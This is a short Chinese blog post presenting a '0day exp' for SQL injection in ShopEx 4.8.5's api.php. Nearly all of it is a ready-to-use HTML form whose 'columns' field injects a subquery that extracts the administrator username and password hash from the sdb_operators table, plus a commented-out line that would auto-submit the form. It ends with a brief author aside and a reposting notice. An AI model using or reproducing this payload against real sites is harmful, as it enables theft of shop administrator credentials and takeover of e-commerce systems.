shopex 4.8.5 api.php注入漏洞0day exp
- 发表于
- Vulndb
1 2 3 4 5 6 7 |
<form method='post' action='http://www.site.com/api.php?act=search_dly_type&api_version=1.0'> columns:<input type='text' value='1,2,(SELECT concat(username,0x7c,userpass) FROM sdb_operators limit 0,1) as name' name='columns' style='width:80%'/><br /> <input type='submit' value='submit' /><br /> </form> <script> //document.forms[0].submit() </script> |
PS:长时间不更新也不是回事,偶尔还是更新一下!
原文连接:shopex 4.8.5 api.php注入漏洞0day exp
所有媒体,可在保留署名、
原文连接
的情况下转载,若非则不得使用我方内容。